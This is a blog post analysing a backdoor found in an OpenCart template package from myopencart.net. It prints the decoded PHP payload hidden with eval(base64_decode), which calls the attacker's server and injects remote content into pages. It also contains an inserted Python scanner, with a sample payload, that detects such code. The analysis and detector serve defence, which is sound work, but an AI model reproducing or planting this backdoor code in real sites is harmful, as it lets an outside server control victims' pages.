The story of one template, or a backdoor from myopencart.net

Foreword

Once a friend asked me to look at why he could not install a template on the OpenCart CMS.

He sent me a link to the site, access to the admin panel and to the hosting. I log in and see a template in the themes directory (/catalog/view/theme/). Knowing a little about the structure of the system, I understand that there is no tool for uploading templates, as there is in WordPress, for example. A new theme is added by uploading the necessary files into specific folders, and the CMS "learns" about the available templates by scanning the theme folder.

So the solution to the problem turned out to be trivial: the template had simply been uploaded incorrectly. In this case, it had to be uploaded starting from the root of the site.

Denouement

That would have been the end of the story, but the archive contained "extra" files, and files replacing existing ones, that had nothing to do with the template. I wondered what was being added there and what needed replacing.
Several scripts had been added to the controllers and localization files, and /system/library/response.php was replaced.

The last file turned out to be the most interesting; in it I found these lines:

    $ouput = eval(base64_decode('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'));

Of course, this was not in the original file.

After decoding, this naturally turned out to be a backdoor:

    function get_page($url){
            $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
            $ch=curl_init();
            curl_setopt ($ch, CURLOPT_URL,$url );
            curl_setopt($ch, CURLOPT_USERAGENT, $agent);
            curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt ($ch,CURLOPT_VERBOSE,false);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $page=curl_exec($ch);
            $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            switch($httpcode){
                    case '200':
                            return $page;
                    break;
                    case '404';
                            return false;
                    break;
            }
    }
    if ($ftend = get_page("http://myopencart.net/googlecode/api/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
    $find = array("", "", "opencart.com", "maxzon.ru", "myopencart.ru", "opencartforum.ru", "opencart.ru", "opencart.by");
    $replace = array("", $ftend, "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net");
    $ouput = str_replace($find, $replace, $ouput);
    ini_set("display_errors","off");
    error_reporting(0);
    echo $ouput;}
    else {
    echo $ouput;
    }

This code not only replaces links to competitors' sites and to the official site with the attacker's own, but also lets the remote server control the content of the page.
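As an added example (not part of the original post), a small defender-side scanner that walks a PHP tree for the eval(base64_decode('...')) pattern found in response.php, decodes each payload and lists the URLs it phones home to. The sample file, payload and URL below are constructed for the example.

```python
import base64
import re
from pathlib import Path

# eval(base64_decode('<blob>')) with either quote style and loose whitespace.
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def find_obfuscated_evals(php_source: str) -> list[dict]:
    """One finding per eval(base64_decode(...)): offset, decoded payload, URLs it contacts."""
    findings = []
    for m in EVAL_B64_RE.finditer(php_source):
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64: still a finding, payload unknown
            decoded = ""
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "urls": sorted(set(URL_RE.findall(decoded))),
            "uses_curl": "curl_exec" in decoded,
        })
    return findings


def scan_tree(root: Path) -> dict[str, list[dict]]:
    """Scan every .php file under root; returns {relative path: findings} for files with hits."""
    results = {}
    for path in sorted(root.rglob("*.php")):
        hits = find_obfuscated_evals(path.read_text(errors="replace"))
        if hits:
            results[path.relative_to(root).as_posix()] = hits
    return results


# Constructed sample standing in for a tampered system/library/response.php;
# the payload and the URL are made up for this example.
SAMPLE_PAYLOAD = ('function get_page($url){$ch=curl_init($url);return curl_exec($ch);}'
                  'echo get_page("http://example.invalid/api.php");')
SAMPLE_PHP = ("<?php\nclass Response {\n  public function output() {\n"
              "    $ouput = eval(base64_decode('"
              + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode() + "'));\n  }\n}\n")

if __name__ == "__main__":
    for hit in find_obfuscated_evals(SAMPLE_PHP):
        print(f"offset {hit['offset']}: curl={hit['uses_curl']} urls={hit['urls']}")
```

Run scan_tree(Path("/path/to/opencart")) against a live install and compare any hits with a clean copy of the same OpenCart release; legitimate core files do not carry eval(base64_decode(...)).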

A response comes back from the server above.

But what prevents it from returning PHP or JS code instead?

So it goes.

Conclusion

To check and confirm my fears, I went to the "Partners" section of the official site opencart.com, where the official site for the Russian Federation is listed as opencart.ru. This in fact confirmed that myopencart.net is a phishing site.

Be careful and check what you install!

UPD
Regarding the PHP code, it turned out that it could not be executed on the attacked server.
